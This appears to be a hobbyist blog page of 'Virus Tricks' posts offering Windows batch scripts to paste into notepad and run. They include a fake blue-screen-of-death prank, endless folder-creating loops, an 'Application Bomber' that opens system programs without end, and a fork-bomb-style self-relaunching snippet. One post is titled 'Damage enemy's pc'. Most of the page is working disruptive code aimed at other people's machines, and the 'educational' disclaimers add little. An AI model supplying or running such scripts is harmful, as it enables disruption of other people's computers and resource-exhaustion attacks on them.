Showing posts with label Virus Tricks. Show all posts
Showing posts with label Virus Tricks. Show all posts

Friday, May 11, 2012

Damage enemy's pc

Hello,

Today I will show you how to create a dangerous virus using vb script. Please don't try it on your own pc. This is only for educational purpose. Virus is really dangerous thing for pc it can damage pc so be carefull before using this trick.

1.Open notepad copy paste following code in it

Tuesday, November 15, 2011

Blue Screen virus

Now here is a cool but dangerous Virus that shows the "blue screen of death" when you run it .. Copy and paste in notepad and save the file as "blue.bat" 


@echo off
cd /
cls
color 1f
echo A problem has been detected and Windows has been shut down to prevent damage
echo to your computer.
echo.
echo The problem seems to be caused by the following file: SPCMDCON.SYS
echo.
echo PAGE_FAULT_IN_NONPAGED_AREA
echo.
echo If this is the first time you've seen this stop error screen,
echo restart your computer. If this screen appears again, follow
echo these steps:
echo.
echo Check to make sure any new hardware or software is properly installed.
echo If this is a new installation, ask your hardware or software manufacturer
echo for any Windows updates you might need.
echo.
echo If problems continue, disable or remove any newly installed hardware
echo or software. Disable BIOS memory options such as caching or shadowing.
echo If you need to use Safe Mode to remove or disable components, restart
echo your computer, press F8 to select Advanced Startup Options, and then
echo select Safe Mode.
echo.
echo Technical information:
echo.
echo *** STOP: 0x00000050 (0xFD3094C2,0x00000001,0xFBFE7617,0x0000 0000)
echo.
echo.
echo *** SPCMDCON.SYS - Address FBFE7617 base at FBFE5000, DateStamp 3d6dd67c
pause :nul
cls
echo Downloading viruses . . .
ping localhost -n 5 :nul
dir /s
pause :nul

don't try on your pc.
 Try at your own risk.its dangerous.

Saturday, November 12, 2011

Folder Replicator Virus

Hello this is fake virus no need to worry.you can delete it easly.
open notepad & type
:loop
md Virus
cd Virus
goto loop
save as vipul.bat

its working successfully.

Enjoy!

Saturday, October 22, 2011

Virus Tricks

1.Application Bomber

open notepad & type
@echo off
:loop
start notepad
start compmgmt.msc
start mspaint
start osk
start cmd
start explorer
start control
start calc
goto loop
save as vipul.bat

2.Batch File Tricks(create 3000 folder in a single minute).txt
open notepad and type
@echo off
:loop
md %random%
goto loop
saveas vipul.bat

3.Cool Batch File Tricks.txt
open notepad and type
@echo off
start
%0
goto :start
save as vipul.bat

More tips will update soon..
Note: try it at your own risk.